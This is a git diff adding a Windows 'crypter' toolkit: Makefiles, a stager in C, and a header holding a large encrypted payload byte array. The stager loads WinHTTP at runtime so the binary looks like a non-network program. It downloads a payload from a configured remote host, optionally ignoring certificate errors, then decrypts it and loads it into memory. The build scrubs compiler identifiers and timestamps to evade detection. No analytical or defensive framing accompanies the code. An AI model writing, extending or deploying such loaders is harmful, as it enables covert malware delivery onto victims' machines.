BLOCK "VarFileInfo" + BEGIN + VALUE "Translation", 0x0409, 0x04B0 + END +END + +1 RT_MANIFEST "stager.manifest" diff --git a/crypter/stager/Makefile b/crypter/stager/Makefile new file mode 100644 index 0000000..7be710a --- /dev/null +++ b/crypter/stager/Makefile @@ -0,0 +1,59 @@ +ifeq ($(OS),Windows_NT) + MSYS2 ?= C:/msys64/mingw64 + CC ?= $(MSYS2)/bin/gcc.exe + STRIP ?= $(MSYS2)/bin/strip.exe + OBJCOPY ?= $(MSYS2)/bin/objcopy.exe + WINDRES ?= $(MSYS2)/bin/windres.exe + PYTHON ?= python + export TMP := $(or $(TMP),$(TEMP),C:/Windows/Temp) + export TEMP := $(TMP) +else + CC ?= x86_64-w64-mingw32-gcc + STRIP ?= x86_64-w64-mingw32-strip + OBJCOPY ?= x86_64-w64-mingw32-objcopy + WINDRES ?= x86_64-w64-mingw32-windres + PYTHON ?= python3 +endif + +TARGET = stager.exe +RES_SRC = ../res/stager.rc +RES_OBJ = stager_res.o + +CFLAGS = -O2 -Wall -Wextra -DNDEBUG -DWIN32_LEAN_AND_MEAN \ + -fno-ident -fno-asynchronous-unwind-tables \ + -fno-stack-protector -fno-builtin \ + -Wno-cast-function-type -nostdlib \ + -I../stub + +# winhttp loaded at runtime via LoadLibraryA — NOT in LDFLAGS. +# This keeps winhttp.dll out of the IAT (stager looks like a non-network binary). +LDFLAGS = -Wl,--entry,WinMainCRTStartup \ + -Wl,-subsystem,windows \ + -Wl,--no-insert-timestamp \ + -lkernel32 + +SRCS = stager.c ../stub/pe_load.c + +.PHONY: all clean + +all: stager_cfg.h $(RES_OBJ) $(TARGET) + +$(RES_OBJ): $(RES_SRC) ../res/stager.manifest + $(WINDRES) -i $(RES_SRC) --input-format=rc -o $(RES_OBJ) --output-format=coff + +$(TARGET): $(SRCS) ../stub/peb_utils.h ../stub/pe_load.h stager_cfg.h $(RES_OBJ) + $(CC) $(CFLAGS) -o $@ $(SRCS) $(RES_OBJ) $(LDFLAGS) + $(STRIP) --strip-all $(TARGET) + $(OBJCOPY) --strip-debug $(TARGET) + $(PYTHON) ../../agent/tools/pe_scrub.py $(TARGET) + @echo "[ok] $(TARGET)" + +stager_cfg.h: + $(error stager_cfg.h missing -- run: python build.py --stager-url https://HOST/path) + +clean: +ifeq ($(OS),Windows_NT) + del /Q $(TARGET) $(RES_OBJ) stager_cfg.h 2>nul & exit 0 +else + rm -f $(TARGET) $(RES_OBJ) stager_cfg.h +endif diff --git a/crypter/stager/stager.c b/crypter/stager/stager.c new file mode 100644 index 0000000..fc7a778 --- /dev/null +++ b/crypter/stager/stager.c @@ -0,0 +1,149 @@ +#include +#include +#include +#include "../stub/pe_load.h" +#include "../stub/peb_utils.h" +#include "stager_cfg.h" + +static void _decrypt(uint8_t *buf, uint32_t len, uint32_t seed) { + uint32_t s = seed; + uint32_t *p = (uint32_t *)buf; + uint32_t n = len >> 2; + for (uint32_t i = 0; i < n; i++) { + p[i] ^= s; + s = s * 1664525u + 1013904223u; + } + uint8_t *t = buf + (n << 2); + for (uint32_t i = 0, rem = len & 3u; i < rem; i++) + t[i] ^= (uint8_t)(s >> (i * 8)); +} + +typedef HINTERNET (WINAPI *pfnWHO)(LPCWSTR,DWORD,LPCWSTR,LPCWSTR,DWORD); +typedef HINTERNET (WINAPI *pfnWHC)(HINTERNET,LPCWSTR,INTERNET_PORT,DWORD); +typedef HINTERNET (WINAPI *pfnWHOR)(HINTERNET,LPCWSTR,LPCWSTR,LPCWSTR,LPCWSTR,LPCWSTR*,DWORD); +typedef BOOL (WINAPI *pfnWHSR)(HINTERNET,LPCWSTR,DWORD,LPVOID,DWORD,DWORD,DWORD_PTR); +typedef BOOL (WINAPI *pfnWHRR)(HINTERNET,LPVOID); +typedef BOOL (WINAPI *pfnWHRD)(HINTERNET,LPVOID,DWORD,LPDWORD); +typedef BOOL (WINAPI *pfnWHQH)(HINTERNET,DWORD,LPCWSTR,LPVOID,LPDWORD,LPDWORD); +typedef BOOL (WINAPI *pfnWHSO)(HINTERNET,DWORD,LPVOID,DWORD); +typedef BOOL (WINAPI *pfnWHCH)(HINTERNET); + +static uint8_t *_fetch(void) { + HMODULE wh = LoadLibraryA("winhttp.dll"); + if (!wh) return NULL; + + pfnWHO fnOpen = (pfnWHO) GetProcAddress(wh, "WinHttpOpen"); + pfnWHC fnConn = (pfnWHC) GetProcAddress(wh, "WinHttpConnect"); + pfnWHOR fnOReq = (pfnWHOR)GetProcAddress(wh, "WinHttpOpenRequest"); + pfnWHSR fnSend = (pfnWHSR)GetProcAddress(wh, "WinHttpSendRequest"); + pfnWHRR fnRecv = (pfnWHRR)GetProcAddress(wh, "WinHttpReceiveResponse"); + pfnWHRD fnRead = (pfnWHRD)GetProcAddress(wh, "WinHttpReadData"); + pfnWHQH fnQHdr = (pfnWHQH)GetProcAddress(wh, "WinHttpQueryHeaders"); +#if STAGER_IGNORE_CERT + pfnWHSO fnSetOpt = (pfnWHSO)GetProcAddress(wh, "WinHttpSetOption"); +#endif + pfnWHCH fnClose = (pfnWHCH)GetProcAddress(wh, "WinHttpCloseHandle"); + if (!fnOpen || !fnConn || !fnOReq || !fnSend || + !fnRecv || !fnRead || !fnQHdr || !fnClose) return NULL; + + HINTERNET hSes = fnOpen( + STAGER_UA, + WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, + WINHTTP_NO_PROXY_NAME, + WINHTTP_NO_PROXY_BYPASS, 0); + if (!hSes) return NULL; + + HINTERNET hCon = fnConn(hSes, STAGER_HOST, (INTERNET_PORT)STAGER_PORT, 0); + if (!hCon) { fnClose(hSes); return NULL; } + + DWORD req_flags = STAGER_USE_SSL ? WINHTTP_FLAG_SECURE : 0; + HINTERNET hReq = fnOReq(hCon, L"GET", STAGER_PATH, + NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, req_flags); + if (!hReq) { fnClose(hCon); fnClose(hSes); return NULL; } + +#if STAGER_IGNORE_CERT + if (fnSetOpt) { + DWORD fl = SECURITY_FLAG_IGNORE_UNKNOWN_CA | + SECURITY_FLAG_IGNORE_CERT_DATE_INVALID | + SECURITY_FLAG_IGNORE_CERT_CN_INVALID | + SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE; + fnSetOpt(hReq, WINHTTP_OPTION_SECURITY_FLAGS, &fl, sizeof(fl)); + } +#endif + + if (!fnSend(hReq, WINHTTP_NO_ADDITIONAL_HEADERS, 0, + WINHTTP_NO_REQUEST_DATA, 0, 0, 0)) { + fnClose(hReq); fnClose(hCon); fnClose(hSes); return NULL; + } + if (!fnRecv(hReq, NULL)) { + fnClose(hReq); fnClose(hCon); fnClose(hSes); return NULL; + } + + /* verify HTTP 200 */ + DWORD status = 0, sz = sizeof(DWORD); + fnQHdr(hReq, + WINHTTP_QUERY_STATUS_CODE | WINHTTP_QUERY_FLAG_NUMBER, + WINHTTP_HEADER_NAME_BY_INDEX, &status, &sz, WINHTTP_NO_HEADER_INDEX); + if (status != 200) { + fnClose(hReq); fnClose(hCon); fnClose(hSes); return NULL; + } + + uint8_t *buf = (uint8_t *)VirtualAlloc( + NULL, PAYLOAD_SIZE + 4096, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + if (!buf) { fnClose(hReq); fnClose(hCon); fnClose(hSes); return NULL; } + + DWORD total = 0, got = 0; + while (total < PAYLOAD_SIZE) { + got = 0; + if (!fnRead(hReq, buf + total, PAYLOAD_SIZE - total, &got)) break; + if (!got) break; + total += got; + } + + fnClose(hReq); + fnClose(hCon); + fnClose(hSes); + + return (total >= PAYLOAD_SIZE) ? buf : NULL; +} + +static DWORD _sys_probe(void) { + SYSTEM_INFO si; + GetNativeSystemInfo(&si); + MEMORYSTATUSEX ms; + ms.dwLength = sizeof(ms); + GlobalMemoryStatusEx(&ms); + char name[MAX_COMPUTERNAME_LENGTH + 1]; + DWORD nlen = sizeof(name); + GetComputerNameA(name, &nlen); + DWORD fp = si.dwNumberOfProcessors ^ (DWORD)(ms.ullTotalPhys >> 20); + for (DWORD i = 0; i < nlen; i++) fp = fp * 31u + (unsigned char)name[i]; + return fp; +} + +static HANDLE _g_inst = NULL; +static BOOL _acquire_instance(void) { + _g_inst = CreateMutexA(NULL, TRUE, + "Global\\{7F3A1C8E-D24B-49AC-B631-E8D5C2A4B9F3}"); + if (!_g_inst) return FALSE; + if (GetLastError() == ERROR_ALREADY_EXISTS) { + CloseHandle(_g_inst); + _g_inst = NULL; + return FALSE; + } + return TRUE; +} + +void __stdcall WinMainCRTStartup(void) { + if (!_acquire_instance()) { ExitProcess(0); return; } + + volatile DWORD fp = _sys_probe(); + (void)fp; + + uint8_t *payload = _fetch(); + if (!payload) { ExitProcess(1); return; } + + _decrypt(payload, PAYLOAD_SIZE, PAYLOAD_SEED); + pe_load(payload, PAYLOAD_SIZE); + ExitProcess(0); +} diff --git a/crypter/stub/Makefile b/crypter/stub/Makefile new file mode 100644 index 0000000..8d2dd7e --- /dev/null +++ b/crypter/stub/Makefile @@ -0,0 +1,68 @@ +ifeq ($(OS),Windows_NT) + MSYS2 ?= C:/msys64/mingw64 + CC ?= $(MSYS2)/bin/gcc.exe + STRIP ?= $(MSYS2)/bin/strip.exe + OBJCOPY ?= $(MSYS2)/bin/objcopy.exe + WINDRES ?= $(MSYS2)/bin/windres.exe + PYTHON ?= python + export TMP := $(or $(TMP),$(TEMP),C:/Windows/Temp) + export TEMP := $(TMP) +else + CC ?= x86_64-w64-mingw32-gcc + STRIP ?= x86_64-w64-mingw32-strip + OBJCOPY ?= x86_64-w64-mingw32-objcopy + WINDRES ?= x86_64-w64-mingw32-windres + PYTHON ?= python3 +endif + +TARGET = loader.exe +RES_SRC = ../res/loader.rc +RES_OBJ = loader_res.o + +# -nostdlib : no CRT — import table = KERNEL32 only +# -fno-builtin : prevents GCC from emitting implicit memcpy/memset calls +# -fno-ident : removes GCC version string from .comment +# -fno-asynchronous-unwind-tables : removes .eh_frame +# -fno-stack-protector: removes __stack_chk_fail import +CFLAGS = -O2 -Wall -Wextra -DNDEBUG -DWIN32_LEAN_AND_MEAN \ + -fno-ident -fno-asynchronous-unwind-tables \ + -fno-stack-protector -fno-builtin \ + -Wno-cast-function-type -nostdlib + +# --entry : custom entry, bypass CRT WinMainCRTStartup wrapper +# -subsystem : GUI — no console window +# --no-insert-timestamp : ld skips timestamp (pe_scrub sets a plausible past date) +# -lkernel32 : VirtualAlloc, ExitProcess, Find/Load/Lock/SizeofResource +LDFLAGS = -Wl,--entry,WinMainCRTStartup \ + -Wl,-subsystem,windows \ + -Wl,--no-insert-timestamp \ + -lkernel32 + +SRCS = stub.c pe_load.c + +.PHONY: all clean + +all: payload_meta.h payload.bin $(RES_OBJ) $(TARGET) + +# payload.bin is embedded into .rsrc via windres — must exist before $(RES_OBJ) +$(RES_OBJ): $(RES_SRC) ../res/loader.manifest payload.bin + $(WINDRES) -i $(RES_SRC) --input-format=rc -o $(RES_OBJ) --output-format=coff + +$(TARGET): $(SRCS) peb_utils.h pe_load.h payload_meta.h $(RES_OBJ) + $(CC) $(CFLAGS) -o $@ $(SRCS) $(RES_OBJ) $(LDFLAGS) + $(STRIP) --strip-all $(TARGET) + $(OBJCOPY) --strip-debug $(TARGET) + $(PYTHON) ../../agent/tools/pe_scrub.py $(TARGET) + @echo "[ok] $(TARGET)" + +payload_meta.h: + $(error payload files missing -- run: python build.py --bake-only) + +payload.bin: payload_meta.h + +clean: +ifeq ($(OS),Windows_NT) + del /Q $(TARGET) $(RES_OBJ) payload_meta.h payload.bin 2>nul & exit 0 +else + rm -f $(TARGET) $(RES_OBJ) payload_meta.h payload.bin +endif diff --git a/crypter/stub/payload.h b/crypter/stub/payload.h new file mode 100644 index 0000000..0073b1f --- /dev/null +++ b/crypter/stub/payload.h @@ -0,0 +1,44072 @@ +#pragma once +#include + +#define PAYLOAD_SEED 0xA7F7DBC9u +#define PAYLOAD_SIZE 705024u + +static const uint8_t PAYLOAD_DATA[] = { + 0x84,0x46,0x62,0x7b,0x5b,0x32,0x2f,0xf1,0xaa,0x25,0xe4,0x5e,0xbd,0xe4,0x5a,0x41, + 0xfb,0x1e,0x39,0x86,0x34,0x18,0x38,0x91,0x2a,0x6b,0xeb,0xe9,0xb1,0x2b,0xbb,0x80, + 0x09,0xf9,0xf2,0x9d,0x8d,0x7e,0xf5,0x66,0x73,0x81,0x8c,0x0c,0x2f,0xa7,0x5c,0x94, + 0xb1,0xc6,0x75,0x3f,0xcf,0xe5,0x07,0x96,0xbd,0xd3,0x2f,0x15,0x38,0x62,0xee,0x72, + 0x52,0x37,0x65,0x84,0xe2,0xdc,0x05,0x96,0xf0,0x98,0x55,0x44,0xdc,0xb4,0x79,0x6d, + 0x63,0xba,0x5e,0xe1,0x00,0xe9,0xe7,0xb3,0x4a,0x31,0x1f,0x4e,0xf2,0x9c,0x66,0xa7, + 0x44,0xae,0xdd,0x23,0xff,0x26,0x3a,0xb5,0xdc,0x48,0x7d,0xc4,0x25,0x39,0x5d,0x02, + 0x25,0x50,0xda,0x14,0x89,0x7a,0x25,0x1b,0x20,0x5f,0x26,0x51,0x68,0x19,0xcd,0xf9, + 0x97,0x1d,0xaf,0x97,0x32,0x18,0x01,0xe7,0x81,0xc2,0xf2,0x5d,0x55,0x45,0xcd,0x1f, + 0x00,0xff,0x2f,0xda,0x05,0xc6,0x6a,0x66,0x05,0xac,0xc4,0x3b,0xd9,0xd6,0x88,0xf6, + 0x5b,0x7a,0x66,0x9e,0xf5,0x54,0xb2,0xcb,0xbe,0xd5,0x65,0x80,0xcf,0xac,0x79,0xd5, + 0x3e,0xec,0xa7,0x21,0xc0,0xd1,0x01,0x41,0x14,0xff,0xc9,0xc3,0x35,0x08,0x66,0xb3, + 0x28,0x06,0x70,0x41,0xe7,0x5a,0xe5,0x8d,0x46,0x31,0x7f,0xd0,0x27,0x1e,0x19,0x27, + 0xc9,0xeb,0x58,0xfd,0x13,0x5a,0x43,0x15,0x20,0x38,0x27,0x33,0xe2,0x0b,0xe3,0x67, + 0xdb,0x46,0x37,0xf4,0x12,0x40,0x1b,0xe1,0x00,0x5e,0x91,0x1c,0xbf,0x82,0xb2,0x47, + 0x47,0x01,0x95,0x23,0xd0,0x01,0x8f,0x96,0x58,0x4d,0xa3,0x59,0x3f,0xd6,0xd9,0x41, + 0x0f,0xe8,0x9c,0x29,0x49,0x45,0xdd,0x7a,0xbb,0xf1,0x66,0x59,0xfd,0xfa,0x48,0x6b, + 0x5a,0xe3,0x7b,0x46,0x57,0x6e,0x68,0x76,0xde,0x43,0x0e,0x29,0x05,0x8d,0x6f,0x7a, + 0x6b,0x6e,0x4f,0x56,0xcd,0xcb,0xaf,0x0e,0x96,0xee,0xbe,0x7a,0x44,0x9b,0xde,0xc5, + 0xa7,0xc4,0x67,0xda,0xd4,0xdd,0x53,0x6a,0xd7,0x8c,0x05,0x98,0xa7,0x1d,0x47,0x43, + 0x92,0x9e,0x55,0xef,0xcd,0xfe,0x14,0x50,0xb6,0x19,0x5e,0x73,0xf9,0x78,0x79,0x8a, + 0x91,0x51,0xac,0x54,0x43,0x33,0xd3,0x26,0x67,0x3e,0x73,0x99,0x77,0xc0,0x65,0xd1, + 0x29,0x5b,0x11,0x67,0xc1,0xda,0x91,0xf3,0xfe,0x7f,0x04,0x39,0x9e,0xa1,0x1c,0xee, + 0x7e,0x53,0x6f,0x27,0xb9,0xf5,0x6d,0x5e,0xb1,0x1c,0x0f,0x21,0x8b,0x7e,0xce,0x58, + 0xd4,0xc9,0xbb,0x32,0x61,0x26,0xa9,0xad,0x7a,0x3e,0xe2,0xc7,0x4e,0x39,0xcc,0x25, + 0x90,0x88,0x02,0xc7,0xe5,0xa0,0xa5,0xc6,0xda,0xe8,0x95,0x23,0x46,0x6e,0x86,0x0c, + 0x36,0x3d,0x98,0xc5,0x92,0x75,0xe1,0x30,0x1a,0xf8,0x98,0xfa,0xae,0x44,0x8c,0x03, + 0xc2,0xbc,0xce,0xc7,0xd3,0xf8,0xfe,0x12,0xc6,0xaf,0xe1,0x93,0x0d,0xaa,0x98,0x21, + 0xf5,0x0d,0xec,0x93,0x37,0x4a,0xb4,0x31,0xb5,0x24,0x00,0xdd,0xdf,0xdd,0x61,0xdc, + 0xf6,0x47,0xc4,0x41,0x48,0x63,0xfc,0x95,0x77,0x63,0xfe,0x12,0x23,0x20,0xf0,0xcb, + 0x23,0x86,0xfb,0x11,0x34,0x2f,0xb7,0x64,0x48,0xa4,0x85,0x5d,0x92,0x0f,0x46,0xc4, + 0x11,0x57,0x6a,0x01,0x87,0x83,0x25,0x25,0xf7,0xde,0x9b,0x8f,0x0b,0x10,0xab,0xfe, + 0x3b,0x8c,0x6d,0xd3,0x19,0x20,0x6d,0x7d,0xc1,0xb7,0xe8,0x6d,0x0a,0x53,0x50,0x4f, + 0xe3,0xa0,0xf0,0x60,0x14,0xcc,0xf2,0x54,0x03,0x05,0x99,0x03,0x8c,0x7f,0xc5,0xad, + 0xbf,0xce,0x5a,0xea,0x87,0x67,0x4b,0x70,0xc4,0x94,0x96,0x60,0xd8,0xd8,0x82,0xb0, + 0x62,0xba,0x9d,0xcf,0xf3,0x64,0x0b,0x38,0xa3,0x68,0x5d,0xb5,0x67,0x93,0x4b,0x4e, + 0x54,0x47,0x33,0x2e,0x25,0x75,0xdd,0x31,0x40,0x51,0x63,0x0e,0x9b,0x4b,0xd1,0x5d, + 0x19,0x21,0xd7,0xa5,0x7d,0x8c,0xbe,0x83,0xc0,0xa4,0xab,0x9a,0x42,0xba,0x2e,0x53, + 0x7a,0x85,0xd6,0xf1,0x6b,0xb4,0xac,0x34,0x1f,0x60,0xff,0x87,0xfb,0xcf,0x49,0xc8, + 0x01,0x0d,0x75,0xb3,0x79,0xab,0xb4,0xaa,0x07,0xc0,0x34,0xd7,0x80,0x8d,0x71,0xf1, + 0x93,0xd6,0x8c,0xa8,0x7e,0x47,0x20,0xed,0xab,0xe4,0x8c,0x61,0x70,0x57,0xed,0xe6, + 0x12,0xfd,0x28,0x0e,0x67,0x04,0x68,0x22,0x59,0x51,0xf6,0xca,0x06,0xbf,0x2d,0x9d, + 0x2d,0x98,0xea,0xa7,0x35,0xb5,0xee,0x0f,0x8b,0x90,0xcd,0x8f,0x9e,0xc7,0xce,0xab, + 0x0c,0x5f,0x11,0x4c,0x77,0x08,0x57,0xdd,0xab,0x75,0x7a,0xfd,0xb6,0xd3,0x5b,0xc9, + 0xb0,0x57,0x2a,0xbf,0xd8,0x48,0x76,0x10,0x77,0xd5,0xe9,0x76,0xea,0xc5,0xca,0x4b, + 0x84,0xdd,0x72,0xde,0x4e,0xb1,0x17,0xd0,0x44,0xe3,0x98,0x34,0x76,0x78,0x0a,0x6a, + 0x7d,0x09,0xa1,0x08,0x67,0x88,0x45,0x62,0xc3,0x80,0x7a,0xb8,0xf7,0xd3,0x0c,0x3a, + 0x60,0x04,0xe2,0x48,0xac,0x6e,0x1c,0xae,0xf8,0x64,0x14,0x60,0x2a,0x84,0x10,0x74, + 0x0d,0x50,0x38,0x14,0x93,0x8f,0xd5,0xfb,0x69,0x25,0x6f,0x9b,0x6a,0x35,0x8a,0xec, + 0xde,0x9a,0xb0,0xd4,0x9f,0xf5,0xee,0x6d,0xf5,0x93,0xd6,0x1b,0x5b,0x4a,0xbd,0x1b, + 0xc9,0xad,0x31,0x58,0xff,0x3b,0xc5,0xcd,0x71,0x69,0x28,0xa3,0x65,0xb7,0x43,0x55, + 0xe7,0x9e,0x15,0x1e,0x60,0xfa,0x12,0x00,0x20,0x1d,0x37,0x6c,0xba,0x90,0xde,0xd0, + 0x08,0x39,0xd2,0x47,0x8f,0xd6,0x87,0x8d,0xfd,0x13,0x69,0xc3,0x0e,0x49,0x4c,0x69, + 0x0e,0xd4,0x02,0x8f,0x38,0x10,0x0b,0xda,0x3c,0xf1,0x66,0x34,0xdf,0x3e,0x84,0x0f, + 0xbc,0x69,0x5d,0x55,0x28,0x0c,0x9c,0xef,0x32,0x03,0xf6,0xef,0xc9,0x21,0x98,0x5b, + 0xf7,0x92,0xbd,0x98,0x4a,0xcc,0x5d,0x71,0x53,0x32,0x02,0xc2,0x48,0x46,0xb6,0xc5, + 0xc3,0x89,0x18,0xf7,0xad,0xf2,0x8d,0xa7,0x34,0x09,0x93,0x1c,0xf8,0x9e,0x30,0x61, + 0x46,0x2a,0x88,0xaf,0x7b,0xc2,0x8d,0x77,0x89,0xb2,0xd0,0x0b,0x97,0xbd,0x76,0xe7, + 0xc2,0xef,0x46,0xa0,0x02,0x1c,0xdd,0x69,0x27,0xf9,0x04,0x3d,0x01,0xd4,0x19,0xad, + 0x9e,0xf2,0xa9,0x48,0xae,0x85,0x1f,0xa1,0x02,0x47,0x95,0x01,0x32,0xb7,0xc9,0xab, + 0x5d,0xee,0x2a,0xc5,0x0b,0x1e,0x11,0xe8,0x2e,0xa7,0x0d,0x47,0x47,0xd7,0x56,0x75, + 0xa4,0x3d,0x62,0xd6,0xc7,0xaa,0x96,0xa4,0xe1,0xc4,0x14,0x9b,0x7c,0x47,0xb2,0x43, + 0x38,0xda,0x0a,0xd9,0xad,0x8b,0xad,0xda,0x6f,0xe8,0x72,0x2d,0x2f,0xba,0xec,0xeb, + 0xfd,0x5f,0xf9,0xcd,0xaa,0xc4,0x76,0x32,0x4b,0xfd,0x10,0xcb,0xda,0x82,0x35,0xe4, + 0x35,0x07,0x36,0x10,0xcb,0x9e,0x55,0xdc,0x03,0x90,0x73,0xe3,0x1b,0x92,0xde,0x44, + 0x0b,0xfa,0xf0,0xf4,0x7d,0x3d,0x05,0x54,0x31,0x90,0x19,0xd6,0xe7,0xff,0xbb,0x9a, + 0x85,0xfa,0xca,0x9f,0x49,0x9d,0x4d,0xab,0xa2,0x6f,0x28,0xd5,0x01,0x7b,0x79,0x3f, + 0x2f,0x52,0x37,0xc1,0x60,0x62,0x0f,0xff,0xcc,0xdf,0x9c,0xbd,0xb4,0x5a,0x7a,0x81, + 0xe7,0x4f,0xf5,0x35,0x88,0x97,0x14,0x62,0xec,0xe7,0x99,0x92,0x94,0x70,0x16,0xb8, + 0x66,0xd9,0x63,0xfb,0xf5,0x2f,0x8a,0x5e,0xd5,0x1f,0x93,0x9e,0x06,0x70,0xaa,0x08, + 0x08,0x57,0xa7,0x18,0xb3,0x04,0xf6,0xdc,0x76,0x3f,0x6a,0x28,0xea,0x9e,0x08,0x22, + 0x1a,0xe0,0xc3,0x18,0xe1,0xd3,0xfe,0xf1,0x30,0xcb,0xf8,0x7f,0x61,0x16,0x97,0xd2, + 0xa7,0xd8,0x6a,0x20,0xa8,0xbd,0x24,0xd4,0x74,0x2c,0x9e,0xf1,0xd3,0x58,0x1e,0x93, + 0xe0,0xda,0x23,0xaa,0x69,0x61,0x14,0x8f,0xe9,0xdd,0x59,0xe9,0x3e,0x54,0xa1,0x16, + 0x71,0x37,0xc0,0x55,0xe4,0x86,0x50,0xec,0x91,0x0b,0xc9,0x02,0xb6,0x97,0x19,0x6f, + 0xfe,0x8c,0x89,0x9e,0xfd,0xe7,0x24,0xdf,0x01,0x23,0x7e,0x29,0x80,0x0c,0x53,0xd3, + 0xa9,0x6f,0xe6,0xa5,0x78,0x19,0x81,0xf3,0x36,0xb3,0x9b,0x9b,0x49,0x19,0x04,0xdd, + 0xee,0x68,0x11,0xdc,0xd3,0xec,0x75,0xf9,0x25,0x95,0xae,0x96,0x54,0xdf,0xd7,0x59, + 0x62,0xde,0x36,0x84,0x04,0x30,0x75,0x08,0x15,0x81,0x35,0xe3,0xa5,0x8d,0xb2,0xd7, + 0x40,0x52,0xfa,0xfb,0x48,0x47,0x54,0x81,0x0e,0x83,0x0a,0xcf,0x5c,0xba,0xed,0x8e, + 0x93,0x45,0xda,0x67,0x15,0xb2,0x80,0x32,0x1f,0x7d,0x7e,0x4a,0x00,0x5d,0x54,0x56, + 0xee,0xcc,0xf4,0xcb,0x2b,0x45,0xfd,0x24,0x44,0x61,0x6b,0x2d,0xb3,0xf4,0x99,0x19, + 0xbc,0x31,0x25,0x3e,0xb0,0x87,0x46,0x7c,0x14,0x4c,0x11,0x26,0xef,0xf7,0x32,0xcd, + 0xa7,0x92,0xc4,0x02,0x0f,0x3b,0xa7,0x36,0xbb,0xd7,0x99,0x09,0x61,0xac,0xfc,0x22, + 0xbb,0x23,0x50,0x06,0xd2,0xde,0x87,0x67,0xfa,0x3d,0x7b,0x4b,0xa5,0x06,0xa7,0x31, + 0x13,0x28,0x67,0x7a,0xc6,0x90,0x1c,0x80,0xd3,0xcc,0xa7,0x37,0x8e,0x63,0x2c,0x35, + 0x5f,0x15,0xb7,0x72,0x20,0xef,0x30,0x15,0xef,0xe6,0xe9,0x0d,0x5b,0x0c,0x10,0xb4, + 0xd4,0x0e,0x1b,0x72,0x42,0xcd,0xed,0x21,0xe4,0x1a,0xb8,0x83,0x2f,0xe6,0x1a,0x51, + 0x7a,0xa1,0xfc,0x1c,0x10,0x22,0xf9,0x89,0xa8,0xd9,0xa9,0x57,0xaf,0xb4,0x7a,0x04, + 0xf9,0xe8,0x0f,0xf0,0xdd,0x6d,0xff,0x10,0x00,0xf4,0x8d,0xa0,0x3b,0xba,0x9b,0x8a, + 0x94,0x72,0x78,0xe3,0xba,0x6c,0x6c,0xff,0xeb,0x66,0xf3,0x60,0x44,0x0c,0x2d,0xe0, + 0x29,0xf7,0xda,0xcb,0x19,0xb6,0x52,0xd8,0xca,0x16,0xd5,0xd8,0xa0,0x7c,0x89,0x1c, + 0xc6,0x70,0x74,0x16,0xdf,0x81,0xee,0x0e,0x7d,0x68,0x9f,0x12,0xf7,0x3d,0x58,0xf5, + 0x5e,0xde,0xc9,0xdc,0xeb,0xc6,0xb6,0x3a,0x31,0x10,0x91,0x37,0xfe,0x17,0x13,0x96, + 0x79,0x5d,0x21,0xe1,0x36,0xbc,0x25,0x38,0x15,0xdd,0x72,0x44,0xeb,0x0e,0x11,0x71, + 0xa2,0x19,0x80,0xe8,0x4d,0x5d,0x57,0x27,0x20,0xce,0x98,0x9f,0x47,0x95,0x47,0xf9, + 0xb2,0xb0,0x40,0xbf,0x18,0x84,0x87,0x4e,0x63,0x3f,0x03,0x49,0x85,0xc9,0xec,0x22, + 0x32,0xbb,0x7c,0x65,0x5d,0x85,0x17,0x10,0xb5,0xb1,0x03,0xea,0x63,0x20,0x72,0xbf, + 0xcb,0x65,0x47,0x35,0xe5,0x3b,0x90,0xfd,0x09,0xdc,0xd9,0xa7,0x24,0xd5,0x68,0xa0, + 0x56,0x04,0x13,0x81,0xe3,0xc0,0x8f,0x7b,0x4e,0xcd,0x40,0xda,0x97,0xb8,0x97,0x00, + 0x23,0xca,0x3c,0x28,0xfa,0x7b,0x56,0x4e,0x61,0x94,0x88,0x35,0x1d,0x39,0x66,0x5d, + 0x49,0x01,0x30,0x87,0x36,0x40,0x80,0xb6,0x34,0x00,0x2c,0x8a,0x1a,0xc8,0x79,0x9f, + 0x78,0xa5,0x8d,0x24,0x74,0xb9,0xcd,0x70,0x98,0xa1,0xa1,0xe7,0x53,0x5d,0xdb,0x77, + 0x08,0x2c,0x16,0x66,0xaf,0x21,0xac,0xa8,0x73,0x59,0x1a,0xfb,0xc1,0xe4,0x15,0xbe, + 0x62,0xbc,0xd1,0xfa,0xa2,0x81,0x87,0x71,0x84,0xc5,0xff,0x8a,0x58,0xfd,0x78,0x24, + 0x8d,0x2e,0xb9,0xe2,0x07,0x79,0x01,0x37,0x8e,0x59,0xac,0x88,0xbb,0x5c,0xd8,0x1f, + 0xab,0xa6,0xb3,0xc5,0x74,0x3a,0x72,0x90,0xc6,0x51,0xf0,0x61,0xf1,0x68,0x65,0x89, + 0x01,0x13,0xfd,0x15,0x37,0xce,0xf1,0x71,0x38,0xfa,0x4c,0xab,0x91,0x5e,0xdd,0x47, + 0x31,0x7e,0xa8,0x72,0xd1,0x1b,0x30,0x8e,0x95,0x73,0xfb,0x5f,0xb2,0x43,0x4c,0xb5, + 0xca,0x93,0x01,0x30,0x3c,0x53,0x5c,0xfc,0xad,0x93,0x66,0x19,0x10,0x36,0x10,0xec, + 0x16,0x41,0x44,0x24,0x1e,0xe8,0xd8,0xe0,0x63,0x5b,0x64,0x6f,0x0d,0x15,0x56,0x51, + 0x3d,0x21,0x57,0xd0,0x5a,0x46,0xd0,0xd1,0x08,0xb3,0xfa,0x5e,0x9f,0xad,0x83,0xe4, + 0xa7,0x78,0x8f,0x21,0xde,0xe5,0x93,0xae,0xe4,0x01,0x9a,0x57,0x04,0xe0,0xa6,0xa8, + 0xb4,0xe5,0x1b,0x14,0x56,0x2a,0x68,0x53,0x2d,0x3f,0x6a,0x6e,0x36,0x9b,0x31,0xe9, + 0x6e,0x0f,0x47,0x9d,0x8c,0x69,0x97,0x02,0x4e,0x0b,0x5c,0xab,0x83,0x2d,0xed,0xd3, + 0x40,0x36,0xe3,0xd0,0xd6,0x73,0x27,0xe3,0xb2,0xb7,0xb4,0x4c,0x79,0x86,0x75,0x13, + 0x49,0xe7,0x0a,0xb2,0x12,0x82,0xfa,0xf4,0x68,0x3a,0x73,0x99,0x5a,0x26,0x8a,0xde, + 0xe0,0xa4,0xd3,0x75,0x21,0xd7,0x77,0x0d,0x49,0xcf,0x2b,0x2a,0x8a,0x7e,0xad,0x4a, + 0x3a,0xb0,0x86,0x47,0x7e,0xd5,0x41,0x9e,0x9b,0x28,0x1e,0x94,0x35,0xe7,0xf9,0x3f, + 0x44,0x87,0xa8,0xf6,0x45,0x71,0xd5,0x4e,0xf0,0x3d,0x07,0xc1,0x66,0x31,0x78,0xc5, + 